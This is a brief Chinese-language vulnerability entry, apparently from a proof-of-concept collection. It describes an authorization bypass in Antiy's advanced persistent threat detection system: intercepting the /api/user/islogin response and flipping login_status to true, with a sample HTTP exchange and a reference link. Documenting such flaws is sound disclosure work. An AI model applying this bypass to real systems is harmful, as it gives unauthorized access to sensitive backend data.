# 安天高级可持续威胁安全检测系统 越权访问漏洞
安天高级可持续威胁安全检测系统存在越权访问漏洞,攻击者可以通过工具修改特定的返回包导致越权后台查看敏感信息。
通过抓包修改login_status的参数为true达到越权。
poc:
```
GET /api/user/islogin HTTP/1.1
Host:target
Response:
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sun, 18 Apr 2021 10:43:46 GMT
Content-Type: application/json
Content-Length: 51
Connection: close
{"role": "", "login_status": false, "result": "ok"}
```
ref:
https://mp.weixin.qq.com/s/Bmn4w_OGMnC4PFKJX85p8A